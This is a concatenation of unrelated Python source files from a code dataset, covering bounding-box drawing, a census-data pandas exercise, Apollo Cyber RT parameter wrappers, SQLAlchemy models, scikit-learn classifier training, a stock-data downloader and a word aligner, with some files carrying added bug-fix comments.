    b2_width = np.maximum(0, b2_xmax - b2_xmin)
    b1_area = b1_height * b1_width
    b2_area = b2_height * b2_width
    # Overlap rectangle and its (clamped) area.
    intersect_xmin = np.maximum(b1_xmin, b2_xmin)
    intersect_ymin = np.maximum(b1_ymin, b2_ymin)
    intersect_xmax = np.minimum(b1_xmax, b2_xmax)
    intersect_ymax = np.minimum(b1_ymax, b2_ymax)
    intersect_height = np.maximum(0, intersect_ymax - intersect_ymin)
    intersect_width = np.maximum(0, intersect_xmax - intersect_xmin)
    intersect_area = intersect_height * intersect_width
    union_area = b1_area + b2_area - intersect_area
    iou = np.nan_to_num(intersect_area/union_area).squeeze()
    return iou
@jit(nopython=True)
def clip_bbox(bboxes_voc, height=720, width=1280):
    """Clip bounding boxes to the image boundaries, in place.

    Args:
        bboxes_voc (np.ndarray): bboxes in [xmin, ymin, xmax, ymax] format.
        height (int, optional): image height. Defaults to 720.
        width (int, optional): image width. Defaults to 1280.

    Returns:
        np.ndarray: the same array, clipped to [0, width] / [0, height].
    """
    # x coords clipped to the width, y coords to the height.
    bboxes_voc[..., 0::2] = bboxes_voc[..., 0::2].clip(0, width)
    bboxes_voc[..., 1::2] = bboxes_voc[..., 1::2].clip(0, height)
    return bboxes_voc
def str2annot(data):
    """Generate annotation array from a string.

    Args:
        data (str): whitespace/newline separated values, 5 per box
            (class plus 4 coordinates).

    Returns:
        np.ndarray: float array of shape (N, 5).
    """
    tokens = data.replace('\n', ' ').strip().split(' ')
    return np.array(tokens).astype(float).reshape(-1, 5)
def annot2str(data):
    """Generate a string from an annotation array.

    Args:
        data (np.ndarray): annotation rows.

    Returns:
        str: one space-joined row per line.
    """
    rows = data.astype(str)
    return '\n'.join(' '.join(row) for row in rows)
def load_image(image_path):
    """Load an image as RGB (cv2 reads BGR; reversing the channel axis flips it).

    NOTE(review): cv2.imread returns None for an unreadable path, which makes
    the slice raise TypeError here — confirm callers pass valid paths.
    """
    return cv2.imread(image_path)[..., ::-1]
def plot_one_box(x, img, color=None, label=None, line_thickness=None):
    # Plots one bounding box on image img
    # x is (x1, y1, x2, y2) in pixels; img is modified in place.
    # Thickness defaults proportionally to the image size.
    tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1  # line/font thickness
    # Random color when none is supplied.
    color = color or [random.randint(0, 255) for _ in range(3)]
    c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
    cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
    if label:
        tf = max(tl - 1, 1)  # font thickness
        t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
        # Filled background box above the top-left corner, then the text.
        c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
        cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA)  # filled
        cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def draw_bboxes(img, bboxes, classes, class_ids, colors = None, show_classes = None, bbox_format = 'yolo', class_name = False, line_thickness = 2):
    """Draw bounding boxes on a copy of *img* and return it.

    Args:
        img: image array (H, W, C); not modified.
        bboxes: sequence of boxes in *bbox_format*.
        classes: per-box class names.
        class_ids: per-box integer class ids.
        colors: single BGR tuple, or a list indexed by class id.
        show_classes: class names to draw (defaults to all of *classes*).
        bbox_format: 'yolo' (normalized xmid/ymid/w/h), 'coco'
            (xmin/ymin/w/h) or 'voc' (xmin/ymin/xmax/ymax).
        class_name: label boxes with the class name instead of the id.
        line_thickness: rectangle/label thickness.

    Raises:
        ValueError: for an unknown *bbox_format*.
    """
    if bbox_format not in ('yolo', 'coco', 'voc'):
        raise ValueError('wrong bbox format')
    image = img.copy()
    show_classes = classes if show_classes is None else show_classes
    colors = (0, 255, 0) if colors is None else colors

    for idx in range(len(bboxes)):
        bbox = bboxes[idx]
        cls = classes[idx]
        cls_id = class_ids[idx]
        color = colors[cls_id] if type(colors) is list else colors
        if cls not in show_classes:
            continue
        if bbox_format == 'yolo':
            # Denormalize, then (xmid, ymid, w, h) -> (x1, y1, x2, y2).
            x1 = round(float(bbox[0]) * image.shape[1])
            y1 = round(float(bbox[1]) * image.shape[0])
            w = round(float(bbox[2]) * image.shape[1] / 2)  # w/2
            h = round(float(bbox[3]) * image.shape[0] / 2)  # h/2
            voc_bbox = (x1 - w, y1 - h, x1 + w, y1 + h)
        elif bbox_format == 'coco':
            # (xmin, ymin, w, h) -> (x1, y1, x2, y2).
            x1 = int(round(bbox[0]))
            y1 = int(round(bbox[1]))
            w = int(round(bbox[2]))
            h = int(round(bbox[3]))
            voc_bbox = (x1, y1, x1 + w, y1 + h)
        else:  # 'voc'
            voc_bbox = (int(round(bbox[0])), int(round(bbox[1])),
                        int(round(bbox[2])), int(round(bbox[3])))
        # BUG FIX: the original yolo branch labelled boxes with
        # str(get_label(cls)) where get_label is undefined (NameError);
        # use the class id, consistent with the coco/voc branches.
        plot_one_box(voc_bbox,
                     image,
                     color = color,
                     label = cls if class_name else str(cls_id),
                     line_thickness = line_thickness)
    return image
| StarcoderdataPython |
1706066 | #Built-in imports
import sys
# External imports
import pandas as pd
def calculate_demographic_data(print_data=True):
    """Analyse the adult census CSV and return demographic statistics.

    Reads "adult.data.csv" from the working directory.

    Args:
        print_data: when True, also print each statistic to stdout.

    Returns:
        dict with the computed statistics (see the return statement below).
    """
    def round_one(x):
        # All percentages/averages are reported to one decimal place.
        return float(round(x,1))
    # Read data from file
    df = pd.read_csv("adult.data.csv")
    # How many of each race are represented in this dataset? This should be a Pandas series with race names as the index labels.
    race_count = df.groupby("race").race.count().sort_values(ascending=False)
    # What is the average age of men?
    average_age_men = round_one(df.age[df.sex == "Male"].mean())
    # What is the percentage of people who have a Bachelor's degree?
    percentage_bachelors = round_one(df.education[df.education == "Bachelors"].count()*100/df.education.count())
    # What percentage of people with advanced education (`Bachelors`, `Masters`, or `Doctorate`) make more than 50K?
    # What percentage of people without advanced education make more than 50K?
    # with and without `Bachelors`, `Masters`, or `Doctorate`
    # education-num >= 13 covers Bachelors and above; 15 is excluded from the
    # "advanced" group (presumably Prof-school — TODO confirm the mapping).
    hi_edu = df.salary[(df["education-num"] >= 13) & (df["education-num"] != 15)]
    lo_edu = df.salary[(df["education-num"] < 13) | (df["education-num"] == 15)]
    # percentage with salary >50K
    higher_education_rich = round_one(hi_edu[hi_edu == ">50K"].count()*100/hi_edu.count())
    lower_education_rich = round_one(lo_edu[lo_edu == ">50K"].count()*100/lo_edu.count())
    # What is the minimum number of hours a person works per week (hours-per-week feature)?
    min_work_hours = df["hours-per-week"].min()
    # What percentage of the people who work the minimum number of hours per week have a salary of >50K?
    peo_h_min = df.salary[df["hours-per-week"] == min_work_hours]
    rich_percentage = round_one(peo_h_min[peo_h_min == ">50K"].count()*100/peo_h_min.count())
    # What country has the highest percentage of people that earn >50K?
    # Per-country ratio of >50K earners to all respondents from that country.
    country_hi_per = df[df.salary == ">50K"].groupby("native-country").salary.count()/df.groupby("native-country").salary.count()
    highest_earning_country = country_hi_per[country_hi_per == country_hi_per.max()].index[0]
    highest_earning_country_percentage = round_one(country_hi_per[highest_earning_country]*100)
    # Identify the most popular occupation for those who earn >50K in India.
    occu_max_num = df[(df["native-country"] == "India") & (df.salary == ">50K")].groupby("occupation").occupation.count()
    top_IN_occupation = occu_max_num[occu_max_num == occu_max_num.max()].index[0]
    # DO NOT MODIFY BELOW THIS LINE
    if print_data:
        print("Number of each race:\n", race_count)
        print("Average age of men:", average_age_men)
        print(f"Percentage with Bachelors degrees: {percentage_bachelors}%")
        print(f"Percentage with higher education that earn >50K: {higher_education_rich}%")
        print(f"Percentage without higher education that earn >50K: {lower_education_rich}%")
        print(f"Min work time: {min_work_hours} hours/week")
        print(f"Percentage of rich among those who work fewest hours: {rich_percentage}%")
        print("Country with highest percentage of rich:", highest_earning_country)
        print(f"Highest percentage of rich people in country: {highest_earning_country_percentage}%")
        print("Top occupations in India:", top_IN_occupation)
    return {
        'race_count': race_count,
        'average_age_men': average_age_men,
        'percentage_bachelors': percentage_bachelors,
        'higher_education_rich': higher_education_rich,
        'lower_education_rich': lower_education_rich,
        'min_work_hours': min_work_hours,
        'rich_percentage': rich_percentage,
        'highest_earning_country': highest_earning_country,
        'highest_earning_country_percentage':
        highest_earning_country_percentage,
        'top_IN_occupation': top_IN_occupation
    }
def main():
    """Entry point: run the analysis with console output enabled."""
    calculate_demographic_data()
# main() returns None, so sys.exit reports a zero (success) exit status.
if __name__ == "__main__":
    sys.exit(main())
133304 | #!/usr/bin/env python3
# ****************************************************************************
# Copyright 2019 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ****************************************************************************
# -*- coding: utf-8 -*-
"""Module for init environment."""
import sys
import os
import importlib
# init vars
# Resolve the Cyber RT install location from the environment and extend
# sys.path so both the python wrappers and the compiled extension modules
# (e.g. _cyber_parameter_py3) are importable.
CYBER_PATH = os.environ['CYBER_PATH']
CYBER_DIR = os.path.split(CYBER_PATH)[0]
sys.path.append(CYBER_PATH + "/third_party/")
sys.path.append(CYBER_PATH + "/lib/")
sys.path.append(CYBER_PATH + "/python/cyber")
sys.path.append(CYBER_PATH + "/python/cyber_py")
sys.path.append(CYBER_PATH + "/lib/python/")
sys.path.append(CYBER_DIR + "/python/")
sys.path.append(CYBER_DIR + "/cyber/")
# C-extension backing every wrapper class below.
_CYBER_PARAM = importlib.import_module('_cyber_parameter_py3')
class Parameter(object):
    """
    Class for Parameter wrapper.

    Wraps a parameter capsule from the _cyber_parameter_py3 C extension.
    Constructed either by adopting an existing capsule or by creating a
    typed (int/float/str) parameter from a name and value.
    """
    def __init__(self, name, value=None):
        # name given, value omitted: *name* is assumed to already be a
        # C-extension parameter capsule and is adopted as-is.
        if (name is not None and value is None):
            self.param = name
        elif (name is None and value is None):
            self.param = _CYBER_PARAM.new_PyParameter_noparam()
        elif isinstance(value, int):
            self.param = _CYBER_PARAM.new_PyParameter_int(name, value)
        elif isinstance(value, float):
            self.param = _CYBER_PARAM.new_PyParameter_double(name, value)
        elif isinstance(value, str):
            self.param = _CYBER_PARAM.new_PyParameter_string(name, value)
        else:
            # NOTE(review): on unsupported types self.param is never set,
            # so __del__ will raise AttributeError — confirm intended.
            print("type is not supported: ", type(value))
    def __del__(self):
        # Release the underlying C capsule.
        _CYBER_PARAM.delete_PyParameter(self.param)
    def type_name(self):
        """
        return Parameter typename
        """
        return _CYBER_PARAM.PyParameter_type_name(self.param)
    def descriptor(self):
        """
        return Parameter descriptor
        """
        return _CYBER_PARAM.PyParameter_descriptor(self.param)
    def name(self):
        """
        return Parameter name
        """
        return _CYBER_PARAM.PyParameter_name(self.param)
    def debug_string(self):
        """
        return Parameter debug string
        """
        return _CYBER_PARAM.PyParameter_debug_string(self.param)
    def as_string(self):
        """
        return native value as a string
        """
        return _CYBER_PARAM.PyParameter_as_string(self.param)
    def as_double(self):
        """
        return native value as a float
        """
        return _CYBER_PARAM.PyParameter_as_double(self.param)
    def as_int64(self):
        """
        return native value as an int
        """
        return _CYBER_PARAM.PyParameter_as_int64(self.param)
class ParameterClient(object):
    """
    Class for ParameterClient wrapper.

    Talks to a remote parameter-server node through the C extension.
    """
    ##
    # @brief constructor the ParameterClient by a node and the parameter server node name.
    #
    # @param node a node to create client.
    # @param server_node_name the parameter server's node name.
    def __init__(self, node, server_node_name):
        self.param_clt = _CYBER_PARAM.new_PyParameterClient(
            node.node, server_node_name)
    def __del__(self):
        # Release the underlying C client handle.
        _CYBER_PARAM.delete_PyParameterClient(self.param_clt)
    def set_parameter(self, param):
        """
        set parameter on the server; param is a Parameter wrapper.
        """
        return _CYBER_PARAM.PyParameter_clt_set_parameter(self.param_clt, param.param)
    def get_parameter(self, param_name):
        """
        get Parameter by param name param_name.
        """
        return Parameter(_CYBER_PARAM.PyParameter_clt_get_parameter(self.param_clt, param_name))
    def get_paramslist(self):
        """
        get all params of the server_node_name parameterserver,
        wrapping each returned capsule in a Parameter.
        """
        pycapsulelist = _CYBER_PARAM.PyParameter_clt_get_parameter_list(
            self.param_clt)
        param_list = []
        for capsuleobj in pycapsulelist:
            param_list.append(Parameter(capsuleobj))
        return param_list
class ParameterServer(object):
    """
    Class for ParameterServer wrapper.

    Hosts parameters on a node via the C extension; clients connect with
    ParameterClient using this node's name.
    """
    ##
    # @brief constructor the ParameterServer by the node object.
    #
    # @param node the node to support the parameter server.
    def __init__(self, node):
        self.param_srv = _CYBER_PARAM.new_PyParameterServer(node.node)
    def __del__(self):
        # Release the underlying C server handle.
        _CYBER_PARAM.delete_PyParameterServer(self.param_srv)
    def set_parameter(self, param):
        """
        set parameter, param is a Parameter wrapper.
        """
        return _CYBER_PARAM.PyParameter_srv_set_parameter(self.param_srv, param.param)
    def get_parameter(self, param_name):
        """
        get Parameter by param name param_name.
        """
        return Parameter(_CYBER_PARAM.PyParameter_srv_get_parameter(self.param_srv, param_name))
    def get_paramslist(self):
        """
        get all params of this parameterserver,
        wrapping each returned capsule in a Parameter.
        """
        pycapsulelist = _CYBER_PARAM.PyParameter_srv_get_parameter_list(
            self.param_srv)
        param_list = []
        for capsuleobj in pycapsulelist:
            param_list.append(Parameter(capsuleobj))
        return param_list
| StarcoderdataPython |
1696499 | # -*- coding: utf-8 -*-
"""User models."""
import datetime as dt
from palette.database import Column, Model, SurrogatePK, db, reference_col, relationship
class Item(SurrogatePK, Model):
    """An item to be created by a user."""

    __tablename__ = 'items'
    name = Column(db.String(80), nullable=False)
    description = Column(db.String(255))  #
    terms = Column(db.String(255))
    price = Column(db.String(80))
    is_active = Column(db.Boolean(), default=True)
    created_at = Column(db.DateTime, default=dt.datetime.utcnow)
    user_id = reference_col('users')  # , nullable=True)
    user = relationship('User', backref='items')

    def __init__(self, name, **kwargs):
        """Create instance."""
        db.Model.__init__(self, name=name, **kwargs)

    def __repr__(self):
        """Represent instance as a unique string."""
        # BUG FIX: the original returned str(id) — that is the *builtin*
        # function id, so every Item printed "<built-in function id>".
        # Restored the formatted representation (the commented-out intent).
        return '<Item({name})>'.format(name=self.name)
class Images(SurrogatePK, Model):
    """An image to be added to an item."""

    __tablename__ = 'images'
    image = Column(db.String(80), nullable=False)
    caption = Column(db.String(80))
    is_primary = Column(db.Boolean(), default=False)
    item_id = reference_col('items')  # , nullable=True)
    item = relationship('Item', backref='images')

    def __init__(self, image, **kwargs):
        """Create instance."""
        # BUG FIX: the original signature took ``name`` but referenced an
        # undefined local ``image``, raising NameError on every construction.
        db.Model.__init__(self, image=image, **kwargs)

    def __repr__(self):
        """Represent instance as a unique string."""
        return '<Image({caption})>'.format(caption=self.caption)
class Reviews(SurrogatePK, Model):
    """A review to be added to an item."""

    __tablename__ = 'reviews'
    stars = Column(db.Integer(), nullable=False)
    comment = Column(db.String(255))
    is_active = Column(db.Boolean(), default=True)
    created_at = Column(db.DateTime, default=dt.datetime.utcnow)  # server_default=text('now()'
    item_id = reference_col('items')  # , nullable=True)
    item = relationship('Item', backref='reviews')
    user_id = reference_col('users')  # , nullable=True) for anon reviews
    user = relationship('User', backref='reviews')

    def __init__(self, stars, **kwargs):
        """Create instance."""
        # BUG FIX: the original signature took ``name`` but referenced an
        # undefined local ``stars``, raising NameError on every construction.
        db.Model.__init__(self, stars=stars, **kwargs)

    def __repr__(self):
        """Represent instance as a unique string."""
        # BUG FIX: the original labelled the repr '<Image(...)>'.
        return '<Reviews({stars})>'.format(stars=self.stars)
| StarcoderdataPython |
121184 | <gh_stars>0
import os
import pickle

import matplotlib.pyplot as plt
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import RidgeClassifier
from sklearn.metrics import balanced_accuracy_score
from sklearn.metrics import f1_score
from sklearn.metrics import plot_confusion_matrix
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.svm import LinearSVC
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
class Classification:
    """Trains and evaluates a configurable set of scikit-learn classifiers.

    ``train`` dispatches config method names to builder methods (e.g.
    "logistic_reg" -> ``train_logistic_reg``), fits each estimator on the
    data, saves the pickled model and a confusion-matrix plot under a
    directory named after the target variable, and returns metrics.

    BUG FIX: every builder below (and train_data) was decorated with
    @staticmethod while still declaring ``self``; each call site invokes
    them through ``self`` with one argument fewer than the signature
    required, so every call raised TypeError. The decorators are removed,
    making them ordinary bound methods — all existing call sites work
    unchanged.
    """

    def __init__(self):
        print("Training Initialized for Continuous Variable:")

    def train(self, data, var, info):
        """Train every configured method on *data* to predict column *var*.

        Args:
            data: pandas DataFrame holding the feature columns and *var*.
            var: target column name (also used as the output directory).
            info: triple (method_list, default_active, params) of equally
                long lists — method name, use-defaults flag, and the
                hyper-parameter dict for each classifier.

        Returns:
            dict mapping method name -> metrics dict, or None when a
            configured method name has no matching builder.
        """
        print(var)
        train_metrics = dict()
        method_list = info[0]
        default_active = info[1]
        params = info[2]
        if not os.path.exists(var):
            os.makedirs(var)
        try:
            for count, method in enumerate(method_list):
                # Resolve the builder, e.g. "ridge" -> self.train_ridge.
                cls = getattr(self, "train_" + method)(default_active[count], params[count])
                train_metrics[method] = self.train_data(data, var, method, cls)
            return train_metrics
        except AttributeError:
            print("The continuous training method '" + method + "' does not exist, kindly check the config files!")

    def train_data(self, data, var, method, cls):
        """Fit *cls* on *data* for target *var*; persist model, plot and metrics.

        Returns a dict of weighted accuracy/precision/recall/f1, or all
        zeros when any step of the pipeline fails.
        """
        try:
            print("Training " + var + " with " + method + " classification method.")
            y = np.array(data[var])
            x = np.array(data.drop(columns=[var]))
            x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42)
            cls.fit(x_train, y_train)
            y_pred = cls.predict(x_test)
            # Persist the fitted model next to its evaluation artifacts.
            pkl_filename = method + ".pkl"
            with open(var + "/" + pkl_filename, 'wb') as file:
                pickle.dump(cls, file)
            plot_confusion_matrix(cls, x_test, y_test)
            plt.title(var + ": Confusion Matrix by " + method + " classification")
            plt.ylabel('Actual Classes')
            plt.xlabel('Predicted Classes')
            plt.savefig(var + "/" + method + "_cm.jpg")
            metric_dict = {
                "accuracy": balanced_accuracy_score(y_test, y_pred),
                "precision": precision_score(y_test, y_pred, average='weighted'),
                "recall": recall_score(y_test, y_pred, average='weighted'),
                "f1_score": f1_score(y_test, y_pred, average='weighted')
            }
            print("Training of " + var + " with " + method + " classification method complete!")
            return metric_dict
        except Exception:
            # NOTE(review): the original bare ``except`` swallowed everything
            # (including KeyboardInterrupt); narrowed to Exception while
            # keeping the zeroed-metrics fallback behaviour.
            print("Training of " + var + " with " + method + " classification method incomplete!")
            return {
                "accuracy": 0,
                "precision": 0,
                "recall": 0,
                "f1_score": 0
            }

    def train_logistic_reg(self, default, param):
        """Build a LogisticRegression (library defaults when *default* is truthy)."""
        if default:
            cls_trainer = LogisticRegression(random_state=0)
        else:
            cls_trainer = LogisticRegression(
                penalty=param["penalty"], dual=param["dual"], tol=param["tol"],
                C=param["C"], fit_intercept=param["fit_intercept"],
                intercept_scaling=param["intercept_scaling"], class_weight=param["class_weight"],
                random_state=param["random_state"], solver=param["solver"],
                max_iter=param["max_iter"], multi_class=param["multi_class"],
                verbose=param["verbose"], warm_start=param["warm_start"],
                n_jobs=param["n_jobs"], l1_ratio=param["l1_ratio"])
        return cls_trainer

    def train_ridge(self, default, param):
        """Build a RidgeClassifier."""
        if default:
            cls_trainer = RidgeClassifier(random_state=0)
        else:
            cls_trainer = RidgeClassifier(
                alpha=param["alpha"], fit_intercept=param["fit_intercept"],
                normalize=param["normalize"], max_iter=param["max_iter"],
                tol=param["tol"], class_weight=param["class_weight"],
                random_state=param["random_state"], solver=param["solver"])
        return cls_trainer

    def train_naive_bayes(self, default, param):
        """Build a MultinomialNB."""
        if default:
            cls_trainer = MultinomialNB()
        else:
            cls_trainer = MultinomialNB(alpha=param["alpha"], fit_prior=param["fit_prior"],
                                        class_prior=param["class_prior"])
        return cls_trainer

    def train_KNN(self, default, param):
        """Build a KNeighborsClassifier."""
        if default:
            cls_trainer = KNeighborsClassifier()
        else:
            # BUG FIX: the original also passed max_iter, which
            # KNeighborsClassifier does not accept (TypeError).
            cls_trainer = KNeighborsClassifier(
                n_neighbors=param["n_neighbors"], weights=param["weights"],
                algorithm=param["algorithm"],
                leaf_size=param["leaf_size"], p=param["p"], metric=param["metric"],
                metric_params=param["metric_params"], n_jobs=param["n_jobs"]
            )
        return cls_trainer

    def train_random_forest(self, default, param):
        """Build a RandomForestClassifier."""
        if default:
            cls_trainer = RandomForestClassifier(random_state=0)
        else:
            cls_trainer = RandomForestClassifier(
                n_estimators=param["n_estimators"], criterion=param["criterion"], max_depth=param["max_depth"],
                min_samples_split=param["min_samples_split"], min_samples_leaf=param["min_samples_leaf"],
                min_weight_fraction_leaf=param["min_weight_fraction_leaf"], max_features=param["max_features"],
                random_state=param["random_state"], max_leaf_nodes=param["max_leaf_nodes"],
                min_impurity_decrease=param["min_impurity_decrease"], bootstrap=param["bootstrap"],
                oob_score=param["oob_score"], n_jobs=param["n_jobs"], verbose=param["verbose"],
                warm_start=param["warm_start"], class_weight=param["class_weight"], ccp_alpha=param["ccp_alpha"],
                max_samples=param["max_samples"])
        return cls_trainer

    def train_decision_tree(self, default, param):
        """Build a DecisionTreeClassifier."""
        if default:
            cls_trainer = DecisionTreeClassifier(random_state=0)
        else:
            cls_trainer = DecisionTreeClassifier(
                criterion=param["criterion"], splitter=param["splitter"], max_depth=param["max_depth"],
                min_samples_split=param["min_samples_split"], min_samples_leaf=param["min_samples_leaf"],
                min_weight_fraction_leaf=param["min_weight_fraction_leaf"], max_features=param["max_features"],
                random_state=param["random_state"], max_leaf_nodes=param["max_leaf_nodes"],
                min_impurity_decrease=param["min_impurity_decrease"], class_weight=param["class_weight"],
                ccp_alpha=param["ccp_alpha"]
            )
        return cls_trainer

    def train_support_vector(self, default, param):
        """Build a support-vector classifier.

        The default path keeps the original LinearSVC; the configured path
        builds SVC, the estimator these keyword arguments belong to.
        """
        if default:
            cls_trainer = LinearSVC(random_state=0)
        else:
            # BUG FIX: kernel/gamma/probability/... are SVC parameters;
            # LinearSVC rejects them with TypeError. Requires the SVC
            # import added to the module import block.
            cls_trainer = SVC(
                C=param["C"], kernel=param["kernel"], degree=param["degree"], gamma=param["gamma"],
                coef0=param["coef0"], shrinking=param["shrinking"], probability=param["probability"], tol=param["tol"],
                cache_size=param["cache_size"], class_weight=param["class_weight"], verbose=param["verbose"],
                max_iter=param["max_iter"], decision_function_shape=param["decision_function_shape"],
                break_ties=param["break_ties"], random_state=param["random_state"]
            )
        return cls_trainer

    def train_neural_MLP(self, default, param):
        """Build an MLPClassifier."""
        if default:
            cls_trainer = MLPClassifier(random_state=0, max_iter=300)
        else:
            cls_trainer = MLPClassifier(
                hidden_layer_sizes=tuple(param["hidden_layer_sizes"]), activation=param["activation"],
                solver=param["solver"],
                alpha=param["alpha"], batch_size=param["batch_size"], learning_rate=param["learning_rate"],
                learning_rate_init=param["learning_rate_init"], power_t=param["power_t"], max_iter=param["max_iter"],
                shuffle=param["shuffle"], random_state=param["random_state"], tol=param["tol"],
                verbose=param["verbose"], warm_start=param["warm_start"], momentum=param["momentum"],
                nesterovs_momentum=param["nesterovs_momentum"], early_stopping=param["early_stopping"],
                validation_fraction=param["validation_fraction"], beta_1=param["beta_1"], beta_2=param["beta_2"],
                epsilon=param["epsilon"], n_iter_no_change=param["n_iter_no_change"], max_fun=param["max_fun"]
            )
        return cls_trainer
| StarcoderdataPython |
1667810 | <gh_stars>0
import setuptools
# Package metadata for the wallstreet_cli distribution.
setuptools.setup(
    # BUG FIX: the original omitted ``name``, so the package built and
    # installed as "UNKNOWN"; the console-script path identifies the
    # intended distribution name.
    name="wallstreet_cli",
    version="0.0.1",
    install_requires=[
        'wallstreet==0.3',
        'forex-python==1.5'
    ],
    description="Wall street cli",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
    # Installs a `wallstreet_cli` console command that runs main().
    entry_points = {
        'console_scripts': ['wallstreet_cli=wallstreet_cli.main:main'],
    }
)
| StarcoderdataPython |
3378494 | <reponame>PySilentSubstitution/silent-sub
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 3 11:00:15 2021
@author: jtm
"""
| StarcoderdataPython |
49696 | <reponame>halilkocaerkek/GitHub-amazon-sagemaker-stock-prediction-alphavantage
import pandas as pd
import matplotlib.pyplot as plt
from enum import Enum
# Enumerations mirroring the Alpha Vantage API's query-parameter values.
Adjusted = Enum('Adjusted', 'true false')
# A leading underscore keeps members valid identifiers; GetInterval strips it.
Interval = Enum('Interval', '_1min _5min _15min _30min _60min')
OutputSize = Enum('outputsize', 'compact full')
DataType = Enum('datatype', 'json csv')
def Slice(year, month):
    """Return the Alpha Vantage slice name, e.g. Slice(1, 2) -> 'year1month2'."""
    return f'year{year}month{month}'
def GetInterval(interval):
    # Map an Interval member to its API value by dropping the '_' prefix,
    # e.g. Interval._60min -> "60min".
    return interval.name[1:]
# NOTE(review): '<KEY>' is an anonymized placeholder left by the dataset
# scrub — supply a real Alpha Vantage API key before running.
key = '<KEY>'
apiUrl = 'https://www.alphavantage.co/query'
def Time_Series_Intraday_Extended(symbol, interval, slice, adjusted, key):
    """Download one month-slice of extended intraday data to data/download/.

    Args:
        symbol: ticker symbol, e.g. 'IBM'.
        interval: Interval enum member.
        slice: slice name from Slice(), e.g. 'year1month2'.
        adjusted: Adjusted enum member (a raw 'true'/'false' string also works).
        key: Alpha Vantage API key.
    """
    url = '{}?function=TIME_SERIES_INTRADAY_EXTENDED&symbol={}&interval={}&slice={}&adjusted={}&apikey={}'
    fileName = 'data/download/{}-{}-{}.csv'.format(symbol, GetInterval(interval), slice)
    # BUG FIX: formatting the Adjusted enum member directly produced
    # "adjusted=Adjusted.false" in the query string; the API expects the
    # bare value "true"/"false", i.e. the member's name.
    adjusted_value = getattr(adjusted, 'name', adjusted)
    data = pd.read_csv(url.format(apiUrl, symbol, GetInterval(interval), slice, adjusted_value, key))
    data.to_csv(fileName)
    print(fileName)
# Fetch every available month-slice (2 years x 12 months) for each symbol
# at a 60-minute interval; each call writes one CSV under data/download/.
for symbol in ['IBM','AAPL']:
    for year in range(1,3):
        for month in range(1,13):
            Time_Series_Intraday_Extended(symbol, Interval._60min, Slice(year,month), Adjusted.false, key)
139357 | import simalign
from tqdm import tqdm
from simalign import SentenceAligner
def parse_file2lines(filename):
    """Read *filename* and return its lines, each stripped of surrounding whitespace."""
    with open(filename) as handle:
        return [line.strip() for line in handle.readlines()]
def align_simaligner(infile_src, infile_tgt, outfile, langs):
    """Word-align parallel files with SimAlign and write Pharaoh-format pairs.

    Args:
        infile_src: path to tokenized source sentences, one per line.
        infile_tgt: path to tokenized target sentences, one per line.
        outfile: output path; one "i-j i-j ..." line per sentence pair.
        langs: language codes; 'de' or 'cs' switches the matching method.
    """
    # 'itermax' by default; German/Czech use the 'inter' matching method.
    moden = 'itermax'
    for lang in langs:
        if lang in ['de', 'cs']:
            moden = 'inter'
    #model options: bert | xlmr |
    tok_src_lines = parse_file2lines(infile_src)
    tok_tgt_lines = parse_file2lines(infile_tgt)
    simple_aligner = SentenceAligner(model="xlmr", token_type="bpe", matching_methods="mai")
    # The output is a dictionary with different matching methods.
    # Each method has a list of pairs indicating the indexes of aligned words (The alignments are zero-indexed).
    alignments=[]
    for src_sentence, trg_sentence in tqdm(zip(tok_src_lines, tok_tgt_lines)):
        alignments.append(simple_aligner.get_word_aligns(src_sentence, trg_sentence)[moden])
    # NOTE(review): the writer is not closed on an exception above this
    # point — consider a with-block; behaviour left unchanged here.
    writer = open(outfile, 'w')
    print('Writing alignments at: '+outfile)
    for alignment in alignments:
        line = ''
        for pair in alignment:
            p = str(pair[0])+'-'+str(pair[1])
            line += p+' '
        writer.write(line.strip()+'\n')
    writer.close()
1762995 | """Entry point"""
from src.view import viewfactory as vf
def main():
    """simple game loop to link a view with our model logic"""
    view = vf.factory_create()
    view.init()
    # Event/update/render loop; runs until the process is terminated.
    while 1:
        view.handle_events()
        view.update()
        view.display()
    # NOTE(review): unreachable — the loop above never breaks, so quit()
    # is never called; confirm whether handle_events exits internally.
    view.quit()
if __name__ == '__main__':
    main()
3277028 | import os
import sys
import praw
import spacy
# Load the small English spaCy pipeline once at import time; NER and textcat
# are disabled because only POS tags are used downstream.
nlp = spacy.load('en_core_web_sm',disable=['ner','textcat'])
import nltk
from nltk.tokenize import word_tokenize
import glob
import pandas as pd
import re
from datetime import datetime
import threading
# Toggle for local development; in production, relative paths are anchored
# to the script's directory.
dev_mode = False


def fix_path(name):
    """Return *name* unchanged in dev mode, else prefix the script directory."""
    if dev_mode:
        return name
    return sys.path[0] + '/' + name
# Get the symbols
class Tickers:
    """Loads every symbol file under datasets/symbols into one DataFrame."""

    def __init__(self):
        df = pd.DataFrame()
        for filename in glob.glob(fix_path('datasets/symbols/*')):
            _df = pd.read_csv(filename, sep='\t')
            # Tag each row with its source exchange, parsed from the filename.
